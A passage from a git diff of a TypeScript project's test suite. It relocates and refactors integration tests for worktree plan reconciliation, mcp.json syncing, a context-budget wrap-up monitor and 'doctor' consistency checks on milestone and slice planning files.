+    // Plan on integration branch (project root): T01 [x], T02 [x]
+    mkdir(planDir, { recursive: true });
+    write(
+      join(tempDir, planRelPath),
+      "# S01 Plan\n- [x] **T01:** task one\n- [x] **T02:** task two\n- [ ] **T03:** task three\n",
+    );
+
+    run(`git add .`, tempDir);
+    run(`git commit -m "add plan with T01 and T02 checked" --allow-empty`, tempDir);
+
+    // Create milestone branch with only T01 [x] (simulating crash before T02 commit)
+    const milestoneBranch = "milestone/M004";
+    run(`git checkout -b ${milestoneBranch}`, tempDir);
+    mkdir(planDir, { recursive: true });
+    write(
+      join(tempDir, planRelPath),
+      "# S01 Plan\n- [x] **T01:** task one\n- [ ] **T02:** task two\n- [ ] **T03:** task three\n",
+    );
+    run(`git add .`, tempDir);
+    run(`git commit -m "milestone: only T01 checked"`, tempDir);
+    run(`git checkout main`, tempDir);
+
+    // Restore project root plan (T01+T02 [x])
+    write(
+      join(tempDir, planRelPath),
+      "# S01 Plan\n- [x] **T01:** task one\n- [x] **T02:** task two\n- [ ] **T03:** task three\n",
+    );
+
+    // Create worktree re-attached to existing milestone branch (T02 still [ ] in branch)
+    const wtPath = createAutoWorktree(tempDir, "M004");
+
+    try {
+      const wtPlanPath = join(wtPath, planRelPath);
+      assert.ok(existsSync(wtPlanPath), "plan file exists in worktree after re-attach");
+
+      const wtPlan = read(wtPlanPath, "utf-8");
+      assert.ok(wtPlan.includes("- [x] **T02:"), "T02 should be [x] after reconciliation (was [ ] on branch)");
+      assert.ok(wtPlan.includes("- [x] **T01:"), "T01 stays [x]");
+      assert.ok(wtPlan.includes("- [ ] **T03:"), "T03 stays [ ] (not in root either)");
+    } finally {
+      teardownAutoWorktree(tempDir, "M004");
+    }
+  });
+
+  test("#2791: mcp.json copied into worktree via copyPlanningArtifacts", () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    // Create mcp.json in .gsd/ AFTER the commit (untracked, like real usage).
+    // copyPlanningArtifacts should copy it into the worktree's .gsd/.
+    writeFileSync(
+      join(tempDir, ".gsd", "mcp.json"),
+      JSON.stringify({ servers: { test: { command: "echo" } } }),
+    );
+
+    const wtPath = createAutoWorktree(tempDir, "M003");
+
+    try {
+      assert.ok(
+        existsSync(join(wtPath, ".gsd", "mcp.json")),
+        "mcp.json should be copied into worktree .gsd/ on creation",
+      );
+    } finally {
+      teardownAutoWorktree(tempDir, "M003");
+    }
+  });
+
+  test("#2791: mcp.json synced via syncGsdStateToWorktree (ROOT_STATE_FILES)", () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    // Create worktree first (no mcp.json yet)
+    const wtPath = createAutoWorktree(tempDir, "M003");
+
+    try {
+      // Now add mcp.json to the main .gsd/ after worktree was created
+      writeFileSync(
+        join(tempDir, ".gsd", "mcp.json"),
+        JSON.stringify({ servers: { test: { command: "echo" } } }),
+      );
+
+      // Sync should pick up the new mcp.json
+      const { synced } = syncGsdStateToWorktree(tempDir, wtPath);
+
+      assert.ok(synced.includes("mcp.json"), "mcp.json should be in the synced list");
+      assert.ok(
+        existsSync(join(wtPath, ".gsd", "mcp.json")),
+        "mcp.json should exist in worktree after sync",
+      );
+    } finally {
+      teardownAutoWorktree(tempDir, "M003");
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/continue-here.test.ts b/src/resources/extensions/gsd/tests/integration/continue-here.test.ts
similarity index 72%
rename from src/resources/extensions/gsd/tests/continue-here.test.ts
rename to src/resources/extensions/gsd/tests/integration/continue-here.test.ts
index 08bd595c3..94f90aab8 100644
--- a/src/resources/extensions/gsd/tests/continue-here.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/continue-here.test.ts
@@ -12,7 +12,7 @@
 import { describe, it } from "node:test";
 import assert from "node:assert/strict";
 
-import { computeBudgets } from "../context-budget.js";
+import { computeBudgets } from "../../context-budget.js";
 
 // ─── Pure threshold / pipeline tests ──────────────────────────────────────────
 // These test the budget engine outputs that the continue-here monitor relies on.
@@ -162,96 +162,92 @@ describe("continue-here", () => {
   });
 
   describe("continueHereFired runtime record field", () => {
-    it("AutoUnitRuntimeRecord includes continueHereFired with default false", async () => {
+    it("AutoUnitRuntimeRecord includes continueHereFired with default false", async (t) => {
       // Import writeUnitRuntimeRecord to verify the field is present and defaults
-      const { writeUnitRuntimeRecord, readUnitRuntimeRecord, clearUnitRuntimeRecord } = await import("../unit-runtime.js");
+      const { writeUnitRuntimeRecord, readUnitRuntimeRecord, clearUnitRuntimeRecord } = await import("../../unit-runtime.js");
       const fs = await import("node:fs");
       const path = await import("node:path");
       const os = await import("node:os");
 
       // Use a temp directory as basePath
       const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "continue-here-test-"));
-      try {
-        const record = writeUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02", Date.now(), {
-          phase: "dispatched",
-          wrapupWarningSent: false,
-        });
+      t.after(() => fs.rmSync(tmpDir, { recursive: true, force: true }));
 
-        assert.equal(record.continueHereFired, false, "default continueHereFired should be false");
+      const record = writeUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02", Date.now(), {
+        phase: "dispatched",
+        wrapupWarningSent: false,
+      });
 
-        // Verify it persists to disk
-        const read = readUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02");
-        assert.ok(read, "record should be readable");
-        assert.equal(read!.continueHereFired, false);
+      assert.equal(record.continueHereFired, false, "default continueHereFired should be false");
 
-        // Update to true
-        const updated = writeUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02", Date.now(), {
-          continueHereFired: true,
-        });
-        assert.equal(updated.continueHereFired, true, "updated continueHereFired should be true");
+      // Verify it persists to disk
+      const read = readUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02");
+      assert.ok(read, "record should be readable");
+      assert.equal(read!.continueHereFired, false);
 
-        // Verify persistence
-        const readUpdated = readUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02");
-        assert.equal(readUpdated!.continueHereFired, true, "persisted continueHereFired should be true");
+      // Update to true
+      const updated = writeUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02", Date.now(), {
+        continueHereFired: true,
+      });
+      assert.equal(updated.continueHereFired, true, "updated continueHereFired should be true");
 
-        // Clean up
-        clearUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02");
-      } finally {
-        fs.rmSync(tmpDir, { recursive: true, force: true });
-      }
+      // Verify persistence
+      const readUpdated = readUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02");
+      assert.equal(readUpdated!.continueHereFired, true, "persisted continueHereFired should be true");
+
+      // Clean up
+      clearUnitRuntimeRecord(tmpDir, "execute-task", "M007/S02/T02");
     });
   });
 
   describe("context-pressure monitor integration", () => {
-    it("should fire wrap-up when context >= threshold and mark continueHereFired", async () => {
-      const { writeUnitRuntimeRecord, readUnitRuntimeRecord, clearUnitRuntimeRecord } = await import("../unit-runtime.js");
+    it("should fire wrap-up when context >= threshold and mark continueHereFired", async (t) => {
+      const { writeUnitRuntimeRecord, readUnitRuntimeRecord, clearUnitRuntimeRecord } = await import("../../unit-runtime.js");
       const fs = await import("node:fs");
       const path = await import("node:path");
       const os = await import("node:os");
 
       const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "continue-here-monitor-"));
-      try {
-        // Simulate the monitor's one-shot logic:
-        // 1. Write initial runtime record (continueHereFired=false)
-        const startedAt = Date.now();
-        writeUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01", startedAt, {
-          phase: "dispatched",
-          wrapupWarningSent: false,
-        });
+      t.after(() => fs.rmSync(tmpDir, { recursive: true, force: true }));
 
-        const budget = computeBudgets(128_000);
-        const threshold = budget.continueThresholdPercent;
+      // Simulate the monitor's one-shot logic:
+      // 1. Write initial runtime record (continueHereFired=false)
+      const startedAt = Date.now();
+      writeUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01", startedAt, {
+        phase: "dispatched",
+        wrapupWarningSent: false,
+      });
 
-        // Simulate the monitor poll: context at 75% (above threshold)
-        const contextPercent = 75;
-        const runtime = readUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01");
-        assert.ok(runtime, "runtime record should exist");
-        assert.equal(runtime!.continueHereFired, false, "initially false");
+      const budget = computeBudgets(128_000);
+      const threshold = budget.continueThresholdPercent;
 
-        // Check: should fire
-        const shouldFire = !runtime!.continueHereFired
-          && contextPercent >= threshold;
-        assert.ok(shouldFire, "should fire when context >= threshold and not yet fired");
+      // Simulate the monitor poll: context at 75% (above threshold)
+      const contextPercent = 75;
+      const runtime = readUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01");
+      assert.ok(runtime, "runtime record should exist");
+      assert.equal(runtime!.continueHereFired, false, "initially false");
 
-        // Mark as fired (what the monitor does)
-        writeUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01", startedAt, {
-          continueHereFired: true,
-        });
+      // Check: should fire
+      const shouldFire = !runtime!.continueHereFired
+        && contextPercent >= threshold;
+      assert.ok(shouldFire, "should fire when context >= threshold and not yet fired");
 
-        // Verify one-shot: second poll should NOT fire
-        const runtime2 = readUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01");
-        assert.ok(runtime2, "runtime record should still exist");
-        assert.equal(runtime2!.continueHereFired, true, "should be marked as fired");
+      // Mark as fired (what the monitor does)
+      writeUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01", startedAt, {
+        continueHereFired: true,
+      });
 
-        const shouldFireAgain = !runtime2!.continueHereFired
-          && contextPercent >= threshold;
-        assert.equal(shouldFireAgain, false, "must not fire again — one-shot guard");
+      // Verify one-shot: second poll should NOT fire
+      const runtime2 = readUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01");
+      assert.ok(runtime2, "runtime record should still exist");
+      assert.equal(runtime2!.continueHereFired, true, "should be marked as fired");
 
-        // Clean up
-        clearUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01");
-      } finally {
-        fs.rmSync(tmpDir, { recursive: true, force: true });
-      }
+      const shouldFireAgain = !runtime2!.continueHereFired
+        && contextPercent >= threshold;
+      assert.equal(shouldFireAgain, false, "must not fire again — one-shot guard");
+
+      // Clean up
+      clearUnitRuntimeRecord(tmpDir, "execute-task", "M001/S01/T01");
     });
 
     it("should not fire when context is below threshold", () => {
diff --git a/src/resources/extensions/gsd/tests/integration/doctor-completion-deferral.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-completion-deferral.test.ts
new file mode 100644
index 000000000..809562d10
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/doctor-completion-deferral.test.ts
@@ -0,0 +1,88 @@
+/**
+ * Regression test for #1808: Completion-transition doctor fix deferral.
+ *
+ * Reconciliation codes are removed — doctor no longer creates summary/UAT
+ * stubs or reports checkbox/file mismatch issues.
+ */
+
+import { mkdirSync, writeFileSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import test from "node:test";
+import assert from "node:assert/strict";
+import { runGSDDoctor } from "../../doctor.ts";
+
+function makeTmp(name: string): string {
+  const dir = join(tmpdir(), `doctor-deferral-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function buildScaffold(base: string) {
+  const gsd = join(base, ".gsd");
+  const m = join(gsd, "milestones", "M001");
+  const s = join(m, "slices", "S01", "tasks");
+  mkdirSync(s, { recursive: true });
+
+  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
+  > Demo text
+`);
+
+  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
+
+**Goal:** test
+
+## Tasks
+
+- [x] **T01: Do stuff** \`est:5m\`
+`);
+
+  writeFileSync(join(s, "T01-SUMMARY.md"), `---
+id: T01
+parent: S01
+milestone: M001
+duration: 5m
+verification_result: passed
+completed_at: 2026-01-01
+---
+
+# T01: Do stuff
+
+Done.
+`);
+}
+
+test("doctor does not report any reconciliation issue codes", async (t) => {
+  const tmp = makeTmp("no-reconciliation");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  buildScaffold(tmp);
+
+  const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
+
+  const REMOVED_CODES = [
+    "task_done_missing_summary",
+    "task_summary_without_done_checkbox",
+    "all_tasks_done_missing_slice_summary",
+    "all_tasks_done_missing_slice_uat",
+    "all_tasks_done_roadmap_not_checked",
+    "slice_checked_missing_summary",
+    "slice_checked_missing_uat",
+  ];
+
+  const codes = report.issues.map(i => i.code);
+  for (const removed of REMOVED_CODES) {
+    assert.ok(!codes.includes(removed as any), `should NOT report removed code: ${removed}`);
+  }
+
+  // No summary or UAT stubs should be created
+  const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
+  assert.ok(!existsSync(sliceSummaryPath), "should NOT have created summary stub");
+
+  const sliceUatPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-UAT.md");
+  assert.ok(!existsSync(sliceUatPath), "should NOT have created UAT stub");
+});
diff --git a/src/resources/extensions/gsd/tests/doctor-delimiter-fix.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-delimiter-fix.test.ts
similarity index 52%
rename from src/resources/extensions/gsd/tests/doctor-delimiter-fix.test.ts
rename to src/resources/extensions/gsd/tests/integration/doctor-delimiter-fix.test.ts
index afd9332fa..4a042990a 100644
--- a/src/resources/extensions/gsd/tests/doctor-delimiter-fix.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/doctor-delimiter-fix.test.ts
@@ -10,9 +10,9 @@ import assert from "node:assert/strict";
 import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
-import { runGSDDoctor } from "../doctor.js";
+import { runGSDDoctor } from "../../doctor.js";
 
-test("doctor fix=true sanitizes em-dash in milestone title", async () => {
+test("doctor fix=true sanitizes em-dash in milestone title", async (t) => {
   const tmpBase = mkdtempSync(join(tmpdir(), "gsd-doctor-delim-"));
   const gsd = join(tmpBase, ".gsd");
   const mDir = join(gsd, "milestones", "M001");
@@ -34,33 +34,31 @@ test("doctor fix=true sanitizes em-dash in milestone title", async () => {
   writeFileSync(join(sDir, "S01-PLAN.md"), `# S01: Initial Setup\n\n## Tasks\n- [ ] **T01: Scaffold** \`est:15m\`\n`);
   writeFileSync(join(tDir, "T01-PLAN.md"), "# T01: Scaffold\n");
 
-  try {
-    // Run doctor with fix=true
-    const report = await runGSDDoctor(tmpBase, { fix: true });
+  t.after(() => rmSync(tmpBase, { recursive: true, force: true }));
 
-    // The em-dash should have been replaced
-    const fixed = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
-    const h1 = fixed.split("\n").find(l => l.startsWith("# "))!;
-    assert.ok(h1, "H1 line should exist");
-    assert.ok(!h1.includes("\u2014"), "em-dash should be replaced");
-    assert.ok(!h1.includes("\u2013"), "en-dash should be replaced");
-    assert.ok(h1.includes("-"), "should contain ASCII hyphen as replacement");
+  // Run doctor with fix=true
+  const report = await runGSDDoctor(tmpBase, { fix: true });
 
-    // Should have recorded the fix
-    assert.ok(
-      report.fixesApplied.some(f => f.includes("sanitized")),
-      `fixesApplied should mention sanitization, got: ${JSON.stringify(report.fixesApplied)}`,
-    );
+  // The em-dash should have been replaced
+  const fixed = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
+  const h1 = fixed.split("\n").find(l => l.startsWith("# "))!;
+  assert.ok(h1, "H1 line should exist");
+  assert.ok(!h1.includes("\u2014"), "em-dash should be replaced");
+  assert.ok(!h1.includes("\u2013"), "en-dash should be replaced");
+  assert.ok(h1.includes("-"), "should contain ASCII hyphen as replacement");
 
-    // The issue should NOT appear in the report (it was fixed)
-    const delimIssues = report.issues.filter(i => i.code === "delimiter_in_title" && i.unitId === "M001");
-    assert.equal(delimIssues.length, 0, "fixed issue should not appear in issues list");
-  } finally {
-    rmSync(tmpBase, { recursive: true, force: true });
-  }
+  // Should have recorded the fix
+  assert.ok(
+    report.fixesApplied.some(f => f.includes("sanitized")),
+    `fixesApplied should mention sanitization, got: ${JSON.stringify(report.fixesApplied)}`,
+  );
+
+  // The issue should NOT appear in the report (it was fixed)
+  const delimIssues = report.issues.filter(i => i.code === "delimiter_in_title" && i.unitId === "M001");
+  assert.equal(delimIssues.length, 0, "fixed issue should not appear in issues list");
 });
 
-test("doctor fix=false still reports delimiter_in_title as warning", async () => {
+test("doctor fix=false still reports delimiter_in_title as warning", async (t) => {
   const tmpBase = mkdtempSync(join(tmpdir(), "gsd-doctor-delim-nf-"));
   const gsd = join(tmpBase, ".gsd");
   const mDir = join(gsd, "milestones", "M001");
@@ -72,16 +70,14 @@ test("doctor fix=false still reports delimiter_in_title as warning", async () =>
   writeFileSync(join(sDir, "S01-PLAN.md"), `# S01: Setup\n\n## Tasks\n- [ ] **T01: Init** \`est:10m\`\n`);
   writeFileSync(join(tDir, "T01-PLAN.md"), "# T01: Init\n");
 
-  try {
-    const report = await runGSDDoctor(tmpBase, { fix: false });
-    const delimIssues = report.issues.filter(i => i.code === "delimiter_in_title");
-    assert.ok(delimIssues.length > 0, "should report delimiter_in_title as issue when fix=false");
-    assert.equal(delimIssues[0].severity, "warning");
+  t.after(() => rmSync(tmpBase, { recursive: true, force: true }));
 
-    // File should be unchanged
-    const content = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
-    assert.ok(content.includes("\u2014"), "file should not be modified when fix=false");
-  } finally {
-    rmSync(tmpBase, { recursive: true, force: true });
-  }
+  const report = await runGSDDoctor(tmpBase, { fix: false });
+  const delimIssues = report.issues.filter(i => i.code === "delimiter_in_title");
+  assert.ok(delimIssues.length > 0, "should report delimiter_in_title as issue when fix=false");
+  assert.equal(delimIssues[0].severity, "warning");
+
+  // File should be unchanged
+  const content = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
+  assert.ok(content.includes("\u2014"), "file should not be modified when fix=false");
 });
diff --git a/src/resources/extensions/gsd/tests/doctor-enhancements.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-enhancements.test.ts
similarity index 77%
rename from src/resources/extensions/gsd/tests/doctor-enhancements.test.ts
rename to src/resources/extensions/gsd/tests/integration/doctor-enhancements.test.ts
index 74aa8a70d..ba8734f30 100644
--- a/src/resources/extensions/gsd/tests/doctor-enhancements.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/doctor-enhancements.test.ts
@@ -1,13 +1,11 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 
-import { runGSDDoctor } from "../doctor.js";
-import { formatDoctorReportJson } from "../doctor-format.js";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
+import { runGSDDoctor } from "../../doctor.js";
+import { formatDoctorReportJson } from "../../doctor-format.js";
 // ── Helpers ─────────────────────────────────────────────────────────────────
 
 function makeBase(): { base: string; gsd: string; mDir: string } {
@@ -30,41 +28,38 @@ function writeSlice(mDir: string, sliceId: string, planContent: string): string
   return sDir;
 }
 
-async function main(): Promise<void> {
+describe('doctor-enhancements', async () => {
   // ── 1. Circular dependency detection ──────────────────────────────────────
-  console.log("\n=== circular dependency detection ===");
-  {
+  test('circular dependency detection', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Circular Test\n\n## Slices\n- [ ] **S01: Slice A** \`risk:low\` \`depends:[S02]\`\n  > After this: done\n- [ ] **S02: Slice B** \`risk:low\` \`depends:[S01]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice A\n\n**Goal:** A\n**Demo:** A\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
     writeSlice(mDir, "S02", "# S02: Slice B\n\n**Goal:** B\n**Demo:** B\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "circular_slice_dependency"),
       "detects circular dependency S01 → S02 → S01",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 2. Duplicate task IDs ──────────────────────────────────────────────────
-  console.log("\n=== duplicate task IDs ===");
-  {
+  test('duplicate task IDs', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Dup Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: First** `est:10m`\n  Task one.\n- [ ] **T01: Duplicate** `est:10m`\n  Task dup.\n");
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "duplicate_task_id"),
       "detects duplicate task ID T01",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 3. Orphaned slice directory ──────────────────────────────────────────
-  console.log("\n=== orphaned slice directory ===");
-  {
+  test('orphaned slice directory', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Orphan Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
@@ -72,16 +67,15 @@ async function main(): Promise<void> {
     mkdirSync(join(mDir, "slices", "S99"), { recursive: true });
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "orphaned_slice_directory" && i.message.includes("S99")),
       "detects orphaned slice directory S99",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 4. Task file not in plan ───────────────────────────────────────────────
-  console.log("\n=== task file not in plan ===");
-  {
+  test('task file not in plan', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Extra Task Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     const sDir = writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [x] **T01: Task** `est:10m`\n  Done.\n");
@@ -91,16 +85,15 @@ async function main(): Promise<void> {
     writeFileSync(join(sDir, "tasks", "T99-SUMMARY.md"), "---\nstatus: done\n---\n# T99\nExtra.\n");
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "task_file_not_in_plan" && i.message.includes("T99")),
       "detects task summary T99 not in plan",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 5. Stale REPLAN file ────────────────────────────────────────────────────
-  console.log("\n=== stale REPLAN detection ===");
-  {
+  test('stale REPLAN detection', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Replan Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     const sDir = writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [x] **T01: Task** `est:10m`\n  Done.\n");
@@ -109,16 +102,15 @@ async function main(): Promise<void> {
     writeFileSync(join(sDir, "S01-REPLAN.md"), "# S01 REPLAN\nSomething changed.\n");
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "stale_replan_file"),
       "detects stale REPLAN when all tasks are done",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 6. Metrics ledger corrupt ───────────────────────────────────────────────
-  console.log("\n=== metrics ledger corrupt ===");
-  {
+  test('metrics ledger corrupt', async () => {
     const { base, gsd, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Metrics Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
@@ -126,16 +118,15 @@ async function main(): Promise<void> {
     writeFileSync(join(gsd, "metrics.json"), '{"version":2,"data":[]}');
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "metrics_ledger_corrupt"),
       "detects corrupt metrics ledger (version != 1)",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 7. Large planning file ──────────────────────────────────────────────────
-  console.log("\n=== large planning file ===");
-  {
+  test('large planning file', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Large File Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     const sDir = writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
@@ -144,16 +135,15 @@ async function main(): Promise<void> {
     writeFileSync(join(sDir, "BIGFILE.md"), bigContent);
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "large_planning_file"),
       "detects large planning file over 100KB",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 8. Future timestamp ─────────────────────────────────────────────────────
-  console.log("\n=== future timestamp ===");
-  {
+  test('future timestamp', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Timestamp Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     const sDir = writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [x] **T01: Task** `est:10m`\n  Done.\n");
@@ -165,16 +155,15 @@ async function main(): Promise<void> {
     );
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(
+    assert.ok(
       result.issues.some(i => i.code === "future_timestamp"),
       "detects future completed_at timestamp",
     );
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 9. JSON output format ───────────────────────────────────────────────────
-  console.log("\n=== JSON output format ===");
-  {
+  test('JSON output format', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: JSON Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
@@ -189,54 +178,49 @@ async function main(): Promise<void> {
       parsed = null;
     }
 
-    assertTrue(parsed !== null, "formatDoctorReportJson produces valid JSON");
-    assertTrue(typeof (parsed as Record<string, unknown>)?.ok === "boolean", "JSON has ok field");
-    assertTrue(Array.isArray((parsed as Record<string, unknown>)?.issues), "JSON has issues array");
-    assertTrue(Array.isArray((parsed as Record<string, unknown>)?.fixesApplied), "JSON has fixesApplied array");
-    assertTrue(typeof (parsed as Record<string, unknown>)?.generatedAt === "string", "JSON has generatedAt field");
-    assertTrue(typeof (parsed as Record<string, unknown>)?.summary === "object", "JSON has summary object");
+    assert.ok(parsed !== null, "formatDoctorReportJson produces valid JSON");
+    assert.ok(typeof (parsed as Record<string, unknown>)?.ok === "boolean", "JSON has ok field");
+    assert.ok(Array.isArray((parsed as Record<string, unknown>)?.issues), "JSON has issues array");
+    assert.ok(Array.isArray((parsed as Record<string, unknown>)?.fixesApplied), "JSON has fixesApplied array");
+    assert.ok(typeof (parsed as Record<string, unknown>)?.generatedAt === "string", "JSON has generatedAt field");
+    assert.ok(typeof (parsed as Record<string, unknown>)?.summary === "object", "JSON has summary object");
 
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 10. Dry-run mode ────────────────────────────────────────────────────────
-  console.log("\n=== dry-run mode ===");
-  {
+  test('dry-run mode', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Dry Run Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
-    const sDir = writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [x] **T01: Task** `est:10m`\n  Done.\n");
+    writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
 
     const result = await runGSDDoctor(base, { fix: true, dryRun: true });
-    // In dry-run mode, no actual files should be created
-    assertTrue(!existsSync(join(sDir, "S01-SUMMARY.md")), "dry-run does not create slice summary");
-    assertTrue(
-      result.fixesApplied.some(f => f.startsWith("[dry-run]")),
-      "dry-run mode reports would-fix entries",
-    );
+    // dry-run with fix:true still runs the doctor; shouldFix() returns false
+    // so no reconciliation fixes are applied through that path
+    assert.ok(result.issues !== undefined, "dry-run still produces issue list");
